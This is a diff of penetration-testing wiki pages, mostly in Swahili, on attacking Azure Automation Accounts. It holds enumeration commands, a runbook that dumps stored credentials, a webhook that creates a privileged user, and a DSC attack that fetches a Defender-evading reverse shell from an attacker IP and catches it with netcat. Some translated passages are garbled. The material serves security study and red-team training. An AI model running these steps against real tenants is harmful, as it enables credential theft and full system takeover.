[From the docs:](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview) Azure Automation **State Configuration** ni huduma ya usimamizi wa usanidi wa Azure inayokuruhusu kuandika, kusimamia, na kuunda PowerShell Desired State Configuration (DSC) [configurations](https://learn.microsoft.com/en-us/powershell/dsc/configurations/configurations) kwa nodi katika wingu lolote au kituo cha data cha ndani. Huduma pia inaingiza [DSC Resources](https://learn.microsoft.com/en-us/powershell/dsc/resources/resources), na inatoa usanidi kwa nodi lengwa, yote katika wingu. Unaweza kufikia Azure Automation State Configuration katika lango la Azure kwa kuchagua **State configuration (DSC)** chini ya **Configuration Management**.
|
||||
|
||||
**Sensitive information** inaweza kupatikana katika usanidi huu.
|
||||
|
||||
### RCE
|
||||
|
||||
Inawezekana kutumia SC kutekeleza scripts za kawaida katika mashine zinazodhibitiwa.
|
||||
|
||||
{{#ref}}
|
||||
az-state-configuration-rce.md
|
||||
{{#endref}}
|
||||
|
||||
## Enumeration
|
||||
```powershell
|
||||
# Check user right for automation
|
||||
az extension add --upgrade -n automation
|
||||
az automation account list # if it doesn't return anything the user is not a part of an Automation group
|
||||
|
||||
# Gets Azure Automation accounts in a resource group
|
||||
Get-AzAutomationAccount
|
||||
|
||||
# List & get DSC configs
|
||||
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
|
||||
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
|
||||
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)
|
||||
|
||||
# List & get Run books code
|
||||
Get-AzAutomationAccount | Get-AzAutomationRunbook
|
||||
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp
|
||||
|
||||
# List credentials & variables & others
|
||||
Get-AzAutomationAccount | Get-AzAutomationCredential
|
||||
Get-AzAutomationAccount | Get-AzAutomationVariable
|
||||
Get-AzAutomationAccount | Get-AzAutomationConnection
|
||||
Get-AzAutomationAccount | Get-AzAutomationCertificate
|
||||
Get-AzAutomationAccount | Get-AzAutomationSchedule
|
||||
Get-AzAutomationAccount | Get-AzAutomationModule
|
||||
Get-AzAutomationAccount | Get-AzAutomationPython3Package
|
||||
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them
|
||||
|
||||
# List hybrid workers
|
||||
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>
|
||||
```
|
||||
### Unda Runbook
|
||||
```powershell
|
||||
# Get the role of a user on the Automation account
|
||||
# Contributor or higher = Can create and execute Runbooks
|
||||
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>
|
||||
|
||||
# Create a Powershell Runbook
|
||||
Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose
|
||||
|
||||
# Publish the Runbook
|
||||
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
|
||||
|
||||
# Start the Runbook
|
||||
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
|
||||
```
|
||||
### Toa Creds & Variables zilizoainishwa katika Akaunti ya Automation kwa kutumia Kitabu cha Kimbunga
|
||||
```powershell
|
||||
# Change the crdentials & variables names and add as many as you need
|
||||
@'
|
||||
$creds = Get-AutomationPSCredential -Name <credentials_name>
|
||||
$runbook_variable = Get-AutomationVariable -name <variable_name>
|
||||
$runbook_variable
|
||||
$creds.GetNetworkCredential().username
|
||||
$creds.GetNetworkCredential().password
|
||||
'@ | out-file -encoding ascii 'runbook_get_creds.ps1'
|
||||
|
||||
$ResourceGroupName = '<resource_group_name>'
|
||||
$AutomationAccountName = '<auto_acc_name>'
|
||||
$RunBookName = 'Exif-Credentials' #Change this for stealthness
|
||||
|
||||
# Creare Run book, publish, start, and get output
|
||||
New-AzAutomationRunBook -name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
|
||||
Import-AzAutomationRunBook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
|
||||
Publish-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
|
||||
$start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
|
||||
start-sleep 20
|
||||
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt
|
||||
```
|
||||
> [!NOTE]
|
||||
> Unaweza kufanya jambo hilo hilo kwa kubadilisha Run Book iliyopo, na kutoka kwenye console ya wavuti.
|
||||
|
||||
### Hatua za Kuweka Mchakato wa Kuunda Mtumiaji wa Juu Kiotomatiki
|
||||
|
||||
#### 1. Anzisha Akaunti ya Kiotomatiki
|
||||
|
||||
- **Hatua Inayohitajika:** Unda Akaunti Mpya ya Kiotomatiki.
|
||||
- **Mipangilio Maalum:** Hakikisha "Create Azure Run As account" imewezeshwa.
|
||||
|
||||
#### 2. Ingiza na Weka Mchakato wa Kuendesha
|
||||
|
||||
- **Chanzo:** Pakua mchakato wa mfano kutoka [MicroBurst GitHub Repository](https://github.com/NetSPI/MicroBurst).
|
||||
- **Hatua Zinazohitajika:**
|
||||
- Ingiza mchakato wa kuendesha kwenye Akaunti ya Kiotomatiki.
|
||||
- Chapisha mchakato wa kuendesha ili uweze kutekelezwa.
|
||||
- Unganisha webhook kwa mchakato wa kuendesha, ukiruhusu vichocheo vya nje.
|
||||
|
||||
#### 3. Sanidi Moduli ya AzureAD
|
||||
|
||||
- **Hatua Inayohitajika:** Ongeza moduli ya AzureAD kwenye Akaunti ya Kiotomatiki.
|
||||
- **Hatua ya Ziada:** Hakikisha moduli zote za Azure Automation zimeboreshwa hadi toleo zao za hivi punde.
|
||||
|
||||
#### 4. Ugawaji wa Ruhusa
|
||||
|
||||
- **Majukumu ya Kuteua:**
|
||||
- Msimamizi wa Mtumiaji
|
||||
- Mmiliki wa Usajili
|
||||
- **Lengo:** Teua majukumu haya kwa Akaunti ya Kiotomatiki kwa ruhusa zinazohitajika.
|
||||
|
||||
#### 5. Ufahamu wa Kupoteza Upatikanaji
|
||||
|
||||
- **Kumbuka:** Kuwa makini kwamba kusanidi kiotomatiki kama hiki kunaweza kusababisha kupoteza udhibiti wa usajili.
|
||||
|
||||
#### 6. Chochea Uundaji wa Mtumiaji
|
||||
|
||||
- Chochea webhook ili kuunda mtumiaji mpya kwa kutuma ombi la POST.
|
||||
- Tumia script ya PowerShell iliyotolewa, hakikisha kubadilisha `$uri` na URL yako halisi ya webhook na kuboresha `$AccountInfo` na jina la mtumiaji na nenosiri unalotaka.
|
||||
```powershell
|
||||
$uri = "<YOUR_WEBHOOK_URL>"
|
||||
$AccountInfo = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
|
||||
$body = ConvertTo-Json -InputObject $AccountInfo
|
||||
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
|
||||
```
|
||||
## Marejeleo
|
||||
|
||||
- [https://learn.microsoft.com/en-us/azure/automation/overview](https://learn.microsoft.com/en-us/azure/automation/overview)
|
||||
- [https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview)
|
||||
- [https://github.com/rootsecdev/Azure-Red-Team#runbook-automation](https://github.com/rootsecdev/Azure-Red-Team#runbook-automation)
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
@@ -1,57 +0,0 @@
|
||||
# Az - State Configuration RCE
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
**Check the complete post in:** [**https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe**](https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe)
|
||||
|
||||
### Muhtasari wa Maandalizi ya Miundombinu ya Server ya K remote (C2) na Hatua
|
||||
|
||||
#### Muonekano
|
||||
|
||||
Mchakato unahusisha kuanzisha miundombinu ya server ya mbali ili kuhifadhi payload iliyobadilishwa ya Nishang `Invoke-PowerShellTcp.ps1`, inayoitwa `RevPS.ps1`, iliyoundwa ili kupita Windows Defender. Payload inatolewa kutoka kwa mashine ya Kali Linux yenye IP `40.84.7.74` kwa kutumia seva rahisi ya HTTP ya Python. Operesheni inatekelezwa kupitia hatua kadhaa:
|
||||
|
||||
#### Hatua ya 1 — Unda Faili
|
||||
|
||||
- **Faili Zinazohitajika:** Skripti mbili za PowerShell zinahitajika:
|
||||
1. `reverse_shell_config.ps1`: Faili ya Desired State Configuration (DSC) inayopata na kutekeleza payload. Inapatikana kutoka [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/reverse_shell_config.ps1).
|
||||
2. `push_reverse_shell_config.ps1`: Skripti ya kuchapisha usanidi kwa VM, inapatikana kwenye [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/push_reverse_shell_config.ps1).
|
||||
- **Ubadilishaji:** Vigezo na parameta katika faili hizi lazima zibadilishwe ili kuendana na mazingira maalum ya mtumiaji, ikiwa ni pamoja na majina ya rasilimali, njia za faili, na vitambulisho vya server/payload.
|
||||
|
||||
#### Hatua ya 2 — Zip Faili ya Usanidi
|
||||
|
||||
- Faili ya `reverse_shell_config.ps1` inashirikiwa katika faili la `.zip`, ikifanya iwe tayari kwa uhamishaji kwenda kwenye Akaunti ya Hifadhi ya Azure.
|
||||
```powershell
|
||||
Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip
|
||||
```
|
||||
#### Step 3 — Set Storage Context & Upload
|
||||
|
||||
- Faili la usanidi lililoshonwa linawekwa kwenye kontena la Azure Storage lililowekwa awali, azure-pentest, kwa kutumia cmdlet ya Azure Set-AzStorageBlobContent.
|
||||
```powershell
|
||||
Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx
|
||||
```
|
||||
#### Step 4 — Prep Kali Box
|
||||
|
||||
- Seva ya Kali inashusha mzigo wa RevPS.ps1 kutoka kwenye hifadhi ya GitHub.
|
||||
```bash
|
||||
wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
|
||||
```
|
||||
- Skripti imehaririwa ili kubaini VM ya Windows inayolengwa na bandari ya shell ya kurudi.
|
||||
|
||||
#### Hatua ya 5 — Chapisha Faili la Mipangilio
|
||||
|
||||
- Faili la mipangilio linafanywa kazi, na kusababisha skripti ya shell ya kurudi kupelekwa kwenye eneo lililotajwa kwenye VM ya Windows.
|
||||
|
||||
#### Hatua ya 6 — Kuweka Payload na Kuanzisha Listener
|
||||
|
||||
- Python SimpleHTTPServer inaanzishwa ili kuhifadhi payload, pamoja na listener ya Netcat kukamata muunganisho unaokuja.
|
||||
```bash
|
||||
sudo python -m SimpleHTTPServer 80
|
||||
sudo nc -nlvp 443
|
||||
```
|
||||
- Kazi iliyoandaliwa inatekeleza mzigo, ikipata haki za kiwango cha SYSTEM.
|
||||
|
||||
#### Hitimisho
|
||||
|
||||
Utekelezaji wa mafanikio wa mchakato huu unafungua uwezekano mwingi wa hatua zaidi, kama vile kupakua hati au kupanua shambulio kwa VMs nyingi. Mwongozo unahimiza kujifunza zaidi na ubunifu katika eneo la Azure Automation DSC.
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
@@ -0,0 +1,227 @@
|
||||
# Az - Automation Accounts
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
## Basic Information
|
||||
|
||||
Azure Automation Accounts ni huduma za msingi za wingu katika Microsoft Azure ambazo husaidia **kujiendesha** kazi kama usimamizi wa rasilimali, usanidi, na masasisho katika Azure na mazingira ya ndani. Zinatoa **Runbooks** (script za kujiendesha ambazo zinafanywa), **ratiba**, na **vikundi vya wafanyakazi wa hybrid** ili kuendesha kazi za kujiendesha, kuwezesha miundombinu kama msimbo (IaC) na kujiendesha kwa mchakato kwa ufanisi na uthabiti katika usimamizi wa rasilimali za wingu.
|
||||
|
||||
### Settings
|
||||
|
||||
- **Credentials**: Nenosiri linaweza kupatikana tu ndani ya runbook ndani ya akaunti ya kujiendesha, zinatumika **kuhifadhi majina ya watumiaji na nenosiri kwa usalama**.
|
||||
- **Variables**: Zinatumika kuhifadhi **data za usanidi** ambazo zinaweza kutumika katika runbooks. Hii inaweza pia kuwa habari nyeti kama funguo za API. Ikiwa variable ime **hifadhiwa kwa usimbuaji**, inapatikana tu ndani ya runbook ndani ya akaunti ya kujiendesha.
|
||||
- **Certificates**: Zinatumika kuhifadhi **vyeti** ambavyo vinaweza kutumika katika runbooks.
|
||||
- **Connections**: Zinatumika kuhifadhi **habari za muunganisho** na huduma za nje. Hii inaweza kuwa na **habari nyeti**.
|
||||
- **Network Access**: Inaweza kuwekwa kuwa **ya umma** au **ya kibinafsi**.
|
||||
|
||||
## Runbooks & Jobs
|
||||
|
||||
Runbook katika Azure Automation ni **script inayofanya kazi kiotomatiki** ndani ya mazingira yako ya wingu. Runbooks zinaweza kuandikwa kwa PowerShell, Python, au wahariri wa picha. Zinasaidia kujiendesha kazi za kiutawala kama usimamizi wa VM, urekebishaji, au ukaguzi wa kufuata.
|
||||
|
||||
Katika **msimbo** ulio ndani ya **Runbooks** unaweza kuwa na **habari nyeti** (kama vile creds).
|
||||
|
||||
Nenda kwa `Automation Accounts` --> `<Select Automation Account>` --> `Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections`
|
||||
|
||||
**Job ni mfano wa utekelezaji wa Runbook**. Unapokimbia Runbook, Job inaundwa kufuatilia utekelezaji huo. Kila kazi inajumuisha:
|
||||
|
||||
- **Status**: Imeorodheshwa, Inaendesha, Imekamilika, Imefail, Imefungwa.
|
||||
- **Output**: Matokeo ya utekelezaji wa Runbook.
|
||||
- **Start and End Time**: Wakati kazi ilianza na kukamilika.
|
||||
|
||||
Kazi ina **matokeo** ya utekelezaji wa **Runbook**. Ikiwa unaweza **kusoma** **kazi**, fanya hivyo kwani **zina** **matokeo** ya kukimbia (habari **nyeti** zinazoweza kuwa).
|
||||
|
||||
### Schedules & Webhooks
|
||||
|
||||
Kuna njia 3 kuu za kutekeleza Runbook:
|
||||
|
||||
- **Schedules**: Hizi zinatumika **kuanzisha** Runbooks kwa **wakati maalum** au **kipindi**.
|
||||
- **Webhooks**: Hizi ni **nukta za HTTP** ambazo zinaweza kutumika **kuanzisha** Runbooks kutoka **huduma za nje**. Kumbuka kwamba URL ya webhook **haiwezi kuonekana** baada ya kuundwa.
|
||||
- **Manual Trigger**: Unaweza **kuanzisha kwa mikono** Runbook kutoka kwenye Azure Portal na kutoka kwa cli.
|
||||
|
||||
### Source Control
|
||||
|
||||
Inaruhusu kuagiza Runbooks kutoka **Github, Azure Devops (Git) na Azure Devops (TFVC)**. Inawezekana kuashiria kuchapisha Runbooks za repo kwenye akaunti ya Azure Automation na pia inawezekana kuashiria **kuunganisha mabadiliko kutoka repo** hadi akaunti ya Azure Automation.
|
||||
|
||||
Wakati kuunganisha kunapoanzishwa, katika **github repository webhook inaundwa** ili kuanzisha kuunganisha kila wakati tukio la push linapotokea. Mfano wa URL ya webhook: `https://f931b47b-18c8-45a2-9d6d-0211545d8c02.webhook.eus.azure-automation.net/webhooks?token=DRjQyFiOrUtz%2fw7o23XbDpOlTe1%2bUqPQm4pQH2WBfJg%3d`
|
||||
|
||||
Kumbuka kwamba hizi webhooks **hazitaonekana** unapoorodhesha webhooks katika runbooks zinazohusiana na repo ya Github. Pia kumbuka kwamba **haiwezekani kubadilisha URL ya repo** ya udhibiti wa chanzo mara tu inapoanzishwa.
|
||||
|
||||
Ili udhibiti wa chanzo uliowekwa ufanye kazi, **Akaunti ya Azure Automation** inahitaji kuwa na kitambulisho kinachodhibitiwa (sistimu au mtumiaji) chenye jukumu la **`Contributor`**. Zaidi ya hayo, ili kupeana kitambulisho kinachodhibitiwa na mtumiaji kwa Akaunti ya Automation, inawezekana kufanya hivyo kwa kuweka variable **`AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID`** kwa **User Managed Identity Client ID**.
|
||||
|
||||
### Runtime Environments
|
||||
|
||||
Unapounda Runbook inawezekana kuchagua mazingira ya utekelezaji. Kwa kawaida, mazingira yafuatayo ya utekelezaji yanapatikana:
|
||||
|
||||
- **Powershell 5.1**
|
||||
- **Powershell 7.1**
|
||||
- **PowerShell 7.2**
|
||||
- **Python 3.10**
|
||||
- **Python 3.8**
|
||||
- **Python 2.7**
|
||||
|
||||
Hata hivyo, pia inawezekana **kuunda mazingira yako mwenyewe**, ukitumia moja ya hizi kama msingi. Katika kesi ya python, inawezekana kupakia pakiti za `.whl` kwenye mazingira ambayo yatatumika. Katika kesi ya PowerShell, inawezekana kupakia pakiti za `.zip` zenye moduli za kuwa nazo katika utekelezaji.
|
||||
|
||||
### Hybrid Worker
|
||||
|
||||
Runbook inaweza kuendeshwa katika **konteina ndani ya Azure** au katika **Hybrid Worker** (kifaa kisichokuwa cha azure).\
|
||||
**Log Analytics Agent** inapelekwa kwenye VM ili kuisajili kama mfanyakazi wa hybrid.\
|
||||
Kazi za mfanyakazi wa hybrid zinaendesha kama **SYSTEM** kwenye Windows na akaunti ya **nxautomation** kwenye Linux.\
|
||||
Kila Mfanyakazi wa Hybrid anasajiliwa katika **Kikundi cha Wafanyakazi wa Hybrid**.
|
||||
|
||||
Hivyo, ikiwa unaweza kuchagua kuendesha **Runbook** katika **Mfanyakazi wa Hybrid wa Windows**, utaendesha **amri zisizo na mipaka** ndani ya kifaa cha nje kama **System** (mbinu nzuri ya pivot).
|
||||
|
||||
### State Configuration (SC)
|
||||
|
||||
>[!WARNING]
|
||||
> Kama ilivyoonyeshwa katika [the docs](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview), Azure Automation State Configuration itastaafu tarehe 30 Septemba 2027 na kubadilishwa na [Azure Machine Configuration](https://learn.microsoft.com/en-us/azure/governance/machine-configuration/overview).
|
||||
|
||||
Akaunti za Kujiendesha pia zinaunga mkono **State Configuration (SC)**, ambayo ni kipengele kinachosaidia **kuweka** na **kuhifadhi** **hali** ya VMs zako. Inawezekana **kuunda** na **kutumia** usanidi wa DSC kwa **Windows** na **Linux** mashine.
|
||||
|
||||
Kutoka kwa mtazamo wa washambuliaji hii ilikuwa ya kuvutia kwa sababu iliruhusu **kutekeleza msimbo wa PS usio na mipaka katika VMs zote zilizowekwa** ikiruhusu kupandisha mamlaka kwa kitambulisho kinachodhibitiwa cha VMs hizi, na huenda ikapita kwenye mitandao mipya... Pia, usanidi unaweza kuwa na **habari nyeti**.
|
||||
|
||||
## Enumeration
|
||||
```bash
|
||||
# List Automation Accounts
|
||||
az automation account list --output table
|
||||
|
||||
# Get Automation Account details
|
||||
# Check the network access in `privateEndpointConnections` and `publicNetworkAccess`
|
||||
# Check the managed identities in `identity`
|
||||
az automation account show --name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
|
||||
|
||||
# Get keys of automation account
|
||||
## These are used for the DSC
|
||||
az automation account list-keys --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
|
||||
|
||||
# Get schedules of automation account
|
||||
az automation schedule list --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
|
||||
|
||||
# Get connections of automation account
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/connections?api-version=2023-11-01"
|
||||
|
||||
# Get connection details
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/connections/<connection-name>?api-version=2023-11-01"
|
||||
|
||||
# Get credentials of automation account
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/credentials?api-version=2023-11-01"
|
||||
|
||||
# Get credential details
|
||||
## Note that you will only be able to access the password from inside a Runbook
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/credentials/<credential-name>?api-version=2023-11-01"
|
||||
|
||||
# Get certificates of automation account
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/certificates?api-version=2023-11-01"
|
||||
|
||||
# Get certificate details
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/certificates/<certificate-name>?api-version=2023-11-01"
|
||||
|
||||
# Get variables of automation account
|
||||
## It's possible to get the value of unencrypted variables but not the encrypted ones
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/variables?api-version=2023-11-01"
|
||||
|
||||
# Get variable details
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/variables/<variable-name>?api-version=2023-11-01"
|
||||
|
||||
# Get runbooks of an automation account
|
||||
az automation runbook list --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
|
||||
|
||||
# Get runbook details
|
||||
az automation runbook show --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME> --name <RUNBOOK-NAME>
|
||||
|
||||
# Get runbook content
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/runbooks/<runbook-name>/content?api-version=2023-11-01"
|
||||
|
||||
# Get jobs of an automation account
|
||||
az automation job list --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
|
||||
|
||||
# Get job details
|
||||
az automation job show --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME> --name <JOB-NAME>
|
||||
|
||||
# Get job output
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/jobs/<job-name>/output?api-version=2023-11-01"
|
||||
|
||||
# Get the Runbook content when the job was executed
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/jobs/<job-name>/runbookContent?api-version=2023-11-01"
|
||||
|
||||
# Get webhooks inside an automation account
|
||||
## It's possible to see to which runbook it belongs in the given data
|
||||
## For security reasons it's not possible to see the URL of the webhook after creating it, here is a URL example: https://f931b47b-18c8-45a2-9d6d-0211545d8c02.webhook.eus.azure-automation.net/webhooks?token=dOdnxk6z7ugAxiuyUMKgPuDMav2Jw5EJediMdiN4jLo%3d
|
||||
## Generating a webhook can be useful from a persistence perspective
|
||||
az rest --method GET \
|
||||
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Automation/automationAccounts/<automation-account-name>/webhooks?api-version=2018-06-30"
|
||||
|
||||
# Get the source control setting of an automation account (if any)
|
||||
## inside the output it's possible to see if the autoSync is enabled, if the publishRunbook is enabled and the repo URL
|
||||
aaz automation source-control list --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
|
||||
|
||||
# Get custom runtime environments
|
||||
## Check in defaultPackages for custom ones, by default Python envs won't have anything here and PS1 envs will have "az" and "azure cli"
|
||||
az automation runtime-environment list \
|
||||
--resource-group <res-group>> \
|
||||
--automation-account-name <account-name> \
|
||||
--query "[?!(starts_with(description, 'System-generated'))]"
|
||||
|
||||
# Get State Configurations (SC) of an automation account
|
||||
az automation dsc configuration list --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME>
|
||||
|
||||
# Get State Configuration details
|
||||
az automation dsc configuration show --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME> --name <DSC-CONFIG-NAME>
|
||||
|
||||
# Get State Configuration content
|
||||
az automation dsc configuration show-content --automation-account-name <AUTOMATION-ACCOUNT> --resource-group <RG-NAME> --name <DSC-CONFIG-NAME>
|
||||
```
|
||||
|
||||
```powershell
|
||||
# Check user right for automation
|
||||
az extension add --upgrade -n automation
|
||||
az automation account list # if it doesn't return anything the user is not a part of an Automation group
|
||||
|
||||
# Gets Azure Automation accounts in a resource group
|
||||
Get-AzAutomationAccount
|
||||
|
||||
# List & get DSC configs
|
||||
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
|
||||
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
|
||||
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)
|
||||
|
||||
# List & get Run books code
|
||||
Get-AzAutomationAccount | Get-AzAutomationRunbook
|
||||
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp
|
||||
|
||||
# List credentials & variables & others
|
||||
Get-AzAutomationAccount | Get-AzAutomationCredential
|
||||
Get-AzAutomationAccount | Get-AzAutomationVariable
|
||||
Get-AzAutomationAccount | Get-AzAutomationConnection
|
||||
Get-AzAutomationAccount | Get-AzAutomationCertificate
|
||||
Get-AzAutomationAccount | Get-AzAutomationSchedule
|
||||
Get-AzAutomationAccount | Get-AzAutomationModule
|
||||
Get-AzAutomationAccount | Get-AzAutomationPython3Package
|
||||
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them
|
||||
|
||||
# List hybrid workers
|
||||
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>
|
||||
```
|
||||
## Kuinua Mamlaka & Baada ya Kutekeleza
|
||||
|
||||
{{#ref}}
|
||||
../az-privilege-escalation/az-automation-accounts-privesc.md
|
||||
{{#endref}}
|
||||
|
||||
## Marejeo
|
||||
|
||||
- [https://learn.microsoft.com/en-us/azure/automation/overview](https://learn.microsoft.com/en-us/azure/automation/overview)
|
||||
- [https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview)
|
||||
- [https://github.com/rootsecdev/Azure-Red-Team#runbook-automation](https://github.com/rootsecdev/Azure-Red-Team#runbook-automation)
|
||||
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
@@ -4,7 +4,7 @@
|
||||
|
||||
## Taarifa za Msingi za Mtandao wa Azure
|
||||
|
||||
Mitandao ya Azure ina **entiti tofauti na njia za kuikamilisha.** Unaweza kupata **maelezo mafupi,** **mfano** na **amri za kuhesabu** za entiti tofauti za mtandao wa Azure katika:
|
||||
Mitandao ya Azure ina **vitu tofauti na njia za kuviunda.** Unaweza kupata **maelezo mafupi,** **mfano** na **amri za kuhesabu** za vitu tofauti vya mtandao wa Azure katika:
|
||||
|
||||
{{#ref}}
|
||||
az-azure-network.md
|
||||
@@ -23,13 +23,13 @@ Mashine za Kijijini za Azure (VMs) ni seva za **wingu zinazoweza kubadilishwa, z
|
||||
- **VMs za Siri**: Zaidi ya uzinduzi wa kuaminika, inatoa kutengwa kwa msingi wa vifaa kati ya VM, hypervisor na usimamizi wa mwenyeji, inaboresha usimbaji wa diski na [**zaidi**](https://learn.microsoft.com/en-us/azure/confidential-computing/confidential-vm-overview)**.**
|
||||
- **Uthibitishaji**: Kwa kawaida **funguo mpya za SSH zinaundwa**, ingawa inawezekana kutumia funguo za umma au kutumia funguo za awali na jina la mtumiaji kwa kawaida ni **azureuser**. Pia inawezekana kuunda mipangilio ya kutumia **neno la siri.**
|
||||
- **Usimbaji wa diski za VM:** Diski inasimbwa kwa kupumzika kwa kawaida kwa kutumia funguo zinazodhibitiwa na jukwaa.
|
||||
- Pia inawezekana kuwezesha **Usimbaji kwenye mwenyeji**, ambapo data itasimbwa kabla ya kutumwa kwa huduma ya uhifadhi, kuhakikisha usimbaji wa mwisho hadi mwisho kati ya mwenyeji na huduma ya uhifadhi ([**docs**](https://learn.microsoft.com/en-gb/azure/virtual-machines/disk-encryption#encryption-at-host---end-to-end-encryption-for-your-vm-data)).
|
||||
- Pia inawezekana kuwezesha **Usimbaji kwenye mwenyeji**, ambapo data itasimbwa kwenye mwenyeji kabla ya kutumwa kwa huduma ya uhifadhi, kuhakikisha usimbaji wa mwisho hadi mwisho kati ya mwenyeji na huduma ya uhifadhi ([**docs**](https://learn.microsoft.com/en-gb/azure/virtual-machines/disk-encryption#encryption-at-host---end-to-end-encryption-for-your-vm-data)).
|
||||
- **Kikundi cha usalama wa mtandao wa NIC**:
|
||||
- **Hakuna**: Kimsingi inafungua kila bandari
|
